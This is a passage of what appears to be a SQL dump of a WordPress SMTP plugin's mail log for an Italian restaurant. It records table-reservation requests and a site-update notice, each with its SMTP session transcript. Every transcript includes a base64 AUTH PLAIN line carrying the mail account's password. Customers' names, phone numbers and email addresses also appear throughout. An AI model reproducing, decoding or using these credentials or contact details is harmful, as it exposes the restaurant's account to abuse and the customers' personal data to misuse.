(https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k7D0x-0005xO-1J\r\n'),(21456,1063,'solution','All good, mail sent.'),(21457,1063,'success','1'),(21458,1063,'from_header','Andrea Tombini <notifiche@ristorantesolymar.it>'),(21459,1063,'to_header','teosphone@gmail.com'),(21460,1063,'reply_to_header','tombini.andrea@tiscali.it'),(21461,1063,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21462,1063,'original_to','teosphone@gmail.com'),(21463,1063,'original_subject','Da sito Sol Y Mar: \"PRENOTAZIONE\"'),(21464,1063,'original_message','Da: Andrea Tombini <tombini.andrea@tiscali.it>\nTelefono: 3357784546\nOggetto: PRENOTAZIONE\n\nCorpo del messaggio:\nBuonasera, è possibile prenotare un tavolo all’esterno per due persone sabato 22 agosto per le ore  20.00. \r\nResto in attesa di vs. conferma .\r\nSaluti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21465,1063,'original_headers','From: Andrea Tombini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: tombini.andrea@tiscali.it\n'),(21466,1063,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 17 Aug 2020 12:36:55 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Andrea Tombini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: tombini.andrea@tiscali.it\r\nMessage-Id: <e49d81daf5ceb476941f1b1246981e04@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"PRENOTAZIONE\"\r\nDate: Mon, 17 Aug 2020 16:36:55 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Andrea Tombini <tombini.andrea@tiscali.it>=0ATelefono: 3357784546=0A=\r\nOggetto: PRENOTAZIONE=0A=0ACorpo del messaggio:=0ABuonasera, =C3=A8 poss=\r\nibile prenotare un tavolo all=E2=80=99esterno per due persone sabato 22=\r\n agosto per le ore  20.00. =0D=0AResto in attesa di vs. conferma .=0D=0A=\r\nSaluti=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un=\r\n modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k7i7z-0004am-5v\r\n'),(21467,1064,'solution','All good, mail sent.'),(21468,1064,'success','1'),(21469,1064,'from_header','Carmela Tomassone <notifiche@ristorantesolymar.it>'),(21470,1064,'to_header','teosphone@gmail.com'),(21471,1064,'reply_to_header','melatomma@gmail.com'),(21472,1064,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21473,1064,'original_to','teosphone@gmail.com'),(21474,1064,'original_subject','Da sito Sol Y Mar: \"Prenotazione 22.8.2020\"'),(21475,1064,'original_message','Da: Carmela Tomassone <melatomma@gmail.com>\nTelefono: 3270765806\nOggetto: Prenotazione 22.8.2020\n\nCorpo del messaggio:\nBuongiorno.chiedo se posso prenotare un tavolo per 2 (sì sta fuori vista mare giusto?) Per sabato ore 20:30/45 a nome Mela.\r\nIn attesa di vs , auguro una buona giornata. \r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21476,1064,'original_headers','From: Carmela Tomassone <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: melatomma@gmail.com\n'),(21477,1064,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 18 Aug 2020 04:25:58 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Carmela Tomassone <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: melatomma@gmail.com\r\nMessage-Id: <b48633c120ce4820477ecb7413739fd8@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione 22.8.2020\"\r\nDate: Tue, 18 Aug 2020 08:25:58 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Carmela Tomassone <melatomma@gmail.com>=0ATelefono: 3270765806=0AOgg=\r\netto: Prenotazione 22.8.2020=0A=0ACorpo del messaggio:=0ABuongiorno.chie=\r\ndo se posso prenotare un tavolo per 2 (s=C3=AC sta fuori vista mare gius=\r\nto?) Per sabato ore 20:30/45 a nome Mela.=0D=0AIn attesa di vs , auguro=\r\n una buona giornata. =0D=0AGrazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1k7wwQ-0007B9-W4\r\n'),(21478,1065,'solution','All good, mail sent.'),(21479,1065,'success','1'),(21480,1065,'from_header','Attilia Bossi <notifiche@ristorantesolymar.it>'),(21481,1065,'to_header','teosphone@gmail.com'),(21482,1065,'reply_to_header','attilia.bossi@interfacetourism.com'),(21483,1065,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21484,1065,'original_to','teosphone@gmail.com'),(21485,1065,'original_subject','Da sito Sol Y Mar: \"Richiesta pranzo martedì 15 settembre\"'),(21486,1065,'original_message','Da: Attilia Bossi <attilia.bossi@interfacetourism.com>\nTelefono: 340 9247192\nOggetto: Richiesta pranzo martedì 15 settembre\n\nCorpo del messaggio:\nBuongiorno,\r\nVi contatto perché dovrei organizzare un pranzo aziendale martedì 15 settembre, per 15 persone.\r\nDurante il pranzo ci servirebbe un’area privata e un televisione dove proiettare un aggiornamento per i nostri invitati.\r\nResto a disposizione per ogni ulteriore informazione o chiarimento in merito, in attesa della vostra migliore quotazione,\r\nCordiali saluti\r\nAttilia Bossi\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21487,1065,'original_headers','From: Attilia Bossi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: attilia.bossi@interfacetourism.com\n'),(21488,1065,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 20 Aug 2020 10:50:08 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Attilia Bossi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: attilia.bossi@interfacetourism.com\r\nMessage-Id: <383b262cb0ef4f8f1047c1b55dac626d@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?Da=20sito=20Sol=20Y=20Mar:=20\"Richiesta=20pranzo=20?=\r\n =?UTF-8?Q?marted=C3=AC=2015=20settembre\"?=\r\nDate: Thu, 20 Aug 2020 14:50:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Attilia Bossi <attilia.bossi@interfacetourism.com>=0ATelefono: 340 9=\r\n247192=0AOggetto: Richiesta pranzo marted=C3=AC 15 settembre=0A=0ACorpo=\r\n del messaggio:=0ABuongiorno,=0D=0AVi contatto perch=C3=A9 dovrei organi=\r\nzzare un pranzo aziendale marted=C3=AC 15 settembre, per 15 persone.=0D=\r\n=0ADurante il pranzo ci servirebbe un=E2=80=99area privata e un televisi=\r\none dove proiettare un aggiornamento per i nostri invitati.=0D=0AResto a=\r\n disposizione per ogni ulteriore informazione o chiarimento in merito, i=\r\nn attesa della vostra migliore quotazione,=0D=0ACordiali saluti=0D=0AAtt=\r\nilia Bossi=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata d=\r\na un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k8ltI-0007w3-6l\r\n'),(21489,1066,'solution','All good, mail sent.'),(21490,1066,'success','1'),(21491,1066,'from_header','Lorenzo <notifiche@ristorantesolymar.it>'),(21492,1066,'to_header','teosphone@gmail.com'),(21493,1066,'reply_to_header','lorenzo.rigoni@prbassociati.eu'),(21494,1066,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21495,1066,'original_to','teosphone@gmail.com'),(21496,1066,'original_subject','Da sito Sol Y Mar: \"Cena per sabato\"'),(21497,1066,'original_message','Da: Lorenzo <lorenzo.rigoni@prbassociati.eu>\nTelefono: 3298690365\nOggetto: Cena per sabato\n\nCorpo del messaggio:\nBuonasera\r\nAvete ancora un tavolo per due persone per sabato sera ?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21498,1066,'original_headers','From: Lorenzo <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: lorenzo.rigoni@prbassociati.eu\n'),(21499,1066,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 20 Aug 2020 13:23:50 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Lorenzo <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: lorenzo.rigoni@prbassociati.eu\r\nMessage-Id: <91101a2d1bff90e2630a4fc2e5833f85@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Cena per sabato\"\r\nDate: Thu, 20 Aug 2020 17:23:50 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Lorenzo <lorenzo.rigoni@prbassociati.eu>=0ATelefono: 3298690365=0AOg=\r\ngetto: Cena per sabato=0A=0ACorpo del messaggio:=0ABuonasera=0D=0AAvete=\r\n ancora un tavolo per due persone per sabato sera ?=0A=0AAccettato=0A=0A=\r\n--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto su Sol=\r\n Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k8oI2-00080X-KE\r\n'),(21500,1067,'solution','All good, mail sent.'),(21501,1067,'success','1'),(21502,1067,'from_header','Ilenia <notifiche@ristorantesolymar.it>'),(21503,1067,'to_header','teosphone@gmail.com'),(21504,1067,'reply_to_header','Ilenia.Romanini@hotmail.com'),(21505,1067,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21506,1067,'original_to','teosphone@gmail.com'),(21507,1067,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21508,1067,'original_message','Da: Ilenia <Ilenia.Romanini@hotmail.com>\nTelefono: 3393443012\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nSalve\r\nAvete un tavolo per domani sera (domenica) per tre persone all’esterno? \r\nIn alternativa, mercoledì o giovedì avreste disponibilità? \r\nGrazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21509,1067,'original_headers','From: Ilenia <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: Ilenia.Romanini@hotmail.com\n'),(21510,1067,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 22 Aug 2020 11:54:21 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Ilenia <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: Ilenia.Romanini@hotmail.com\r\nMessage-Id: <7ce3d9510be1fe24af7eb96093e30696@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione tavolo\"\r\nDate: Sat, 22 Aug 2020 15:54:21 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Ilenia <Ilenia.Romanini@hotmail.com>=0ATelefono: 3393443012=0AOggett=\r\no: Prenotazione tavolo=0A=0ACorpo del messaggio:=0ASalve=0D=0AAvete un t=\r\navolo per domani sera (domenica) per tre persone all=E2=80=99esterno?=\r\n =0D=0AIn alternativa, mercoled=C3=AC o gioved=C3=AC avreste disponibili=\r\nt=C3=A0? =0D=0AGrazie mille=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=\r\n=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www.ris=\r\ntorantesolymar.it)\r\n.\r\n250 OK id=1k9VqX-0003Ub-Jz\r\n'),(21511,1068,'solution','All good, mail sent.'),(21512,1068,'success','1'),(21513,1068,'from_header','Domenico Bignamini <notifiche@ristorantesolymar.it>'),(21514,1068,'to_header','teosphone@gmail.com'),(21515,1068,'reply_to_header','domenico.bignamini@gmail.com'),(21516,1068,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21517,1068,'original_to','teosphone@gmail.com'),(21518,1068,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo per 5 (3+2 bambini)\"'),(21519,1068,'original_message','Da: Domenico Bignamini <domenico.bignamini@gmail.com>\nTelefono: 3463563399\nOggetto: Prenotazione tavolo per 5 (3+2 bambini)\n\nCorpo del messaggio:\nTavolo per 5,\r\nSere da giovedì a domenica p. v.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21520,1068,'original_headers','From: Domenico Bignamini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: domenico.bignamini@gmail.com\n'),(21521,1068,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 25 Aug 2020 10:21:11 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Domenico Bignamini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: domenico.bignamini@gmail.com\r\nMessage-Id: <25ff93d759f838f125a9b72a1fbfddd1@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione tavolo per 5 (3+2 bambini)\"\r\nDate: Tue, 25 Aug 2020 14:21:11 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Domenico Bignamini <domenico.bignamini@gmail.com>=0ATelefono: 346356=\r\n3399=0AOggetto: Prenotazione tavolo per 5 (3+2 bambini)=0A=0ACorpo del m=\r\nessaggio:=0ATavolo per 5,=0D=0ASere da gioved=C3=AC a domenica p. v.=0A=\r\n=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo d=\r\ni contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kAZp1-0000AT-7x\r\n'),(21522,1069,'solution','All good, mail sent.'),(21523,1069,'success','1'),(21524,1069,'from_header','Giulia Pepsini <notifiche@ristorantesolymar.it>'),(21525,1069,'to_header','teosphone@gmail.com'),(21526,1069,'reply_to_header','giuliapepsini@gmail.com'),(21527,1069,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21528,1069,'original_to','teosphone@gmail.com'),(21529,1069,'original_subject','Da sito Sol Y Mar: \"PRENOTAZIONE\"'),(21530,1069,'original_headers','From: Giulia Pepsini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: giuliapepsini@gmail.com\n'),(21531,1069,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 28 Aug 2020 12:01:04 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Giulia Pepsini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: giuliapepsini@gmail.com\r\nMessage-Id: <a068b006efcb95d4791ca4f070fffc54@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"PRENOTAZIONE\"\r\nDate: Fri, 28 Aug 2020 16:01:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Giulia Pepsini <giuliapepsini@gmail.com>=0ATelefono: 3207930673=0AOg=\r\ngetto: PRENOTAZIONE=0A=0ACorpo del messaggio:=0ABuon pomeriggio =0D=0ASc=\r\nrivo per prenotare un tavolo per 2 =0D=0ADomani sera alle 21=0D=0ASaluti=\r\n =F0=9F=98=8A=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviat=\r\na da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.i=\r\nt)\r\n.\r\n250 OK id=1kBgoK-0007qB-V0\r\n'),(21532,1070,'solution','All good, mail sent.'),(21533,1070,'success','1'),(21534,1070,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21535,1070,'to_header','webmaster@baldisserri.com'),(21536,1070,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21537,1070,'original_to','webmaster@baldisserri.com'),(21538,1070,'original_subject','[Sol Y Mar, ristorante a Riccione] Il tuo sito è aggiornato a WordPress 5.5.1'),(21539,1070,'original_message','Ciao! Il tuo sito su https://www.ristorantesolymar.it è stato aggiornato automaticamente a WordPress 5.5.1.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.5.1 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress\n'),(21540,1070,'original_headers',''),(21541,1070,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 01 Sep 2020 20:38:53 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <1ac72ad7813160c06586644c8a1e36d8@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?[Sol=20Y=20Mar=2C=20ristorante=20a=20Riccione]=20Il=20?=\r\n =?UTF-8?Q?tuo=20sito=20=C3=A8=20aggiornato=20a=20WordPress=205.5.1?=\r\nDate: Wed, 02 Sep 2020 00:38:53 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Il tuo sito su https://www.ristorantesolymar.it =C3=A8 stato aggio=\r\nrnato automaticamente a WordPress 5.5.1.=0A=0ANon =C3=A8 richiesta da pa=\r\nrte tua alcuna altra operazione. Per altre informazioni sulla versione 5=\r\n..5.1 vedi la schermata Informazioni su WordPress:=0Ahttps://www.ristoran=\r\ntesolymar.it/wp-admin/about.php=0A=0ASe hai problemi di qualsiasi tipo o=\r\n hai bisogno di aiuto, i volontari dei forum di supporto su https://it.w=\r\nordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpres=\r\ns.org/support/forums/=0A=0AIl team di WordPress=0A\r\n.\r\n250 OK id=1kDGnd-0003zq-7b\r\n'),(21542,1073,'solution','All good, mail sent.'),(21543,1073,'success','1'),(21544,1073,'from_header','Mauro Candi <notifiche@ristorantesolymar.it>'),(21545,1073,'to_header','teosphone@gmail.com'),(21546,1073,'reply_to_header','mauro23candi23@gmail.com'),(21547,1073,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21548,1073,'original_to','teosphone@gmail.com'),(21549,1073,'original_subject','Da sito Sol Y Mar: \"prenotazione tavolo per 2 persone\"'),(21550,1073,'original_message','Da: Mauro Candi <mauro23candi23@gmail.com>\nTelefono: 3423029793\nOggetto: prenotazione tavolo per 2 persone\n\nCorpo del messaggio:\nVorrei prenotare un 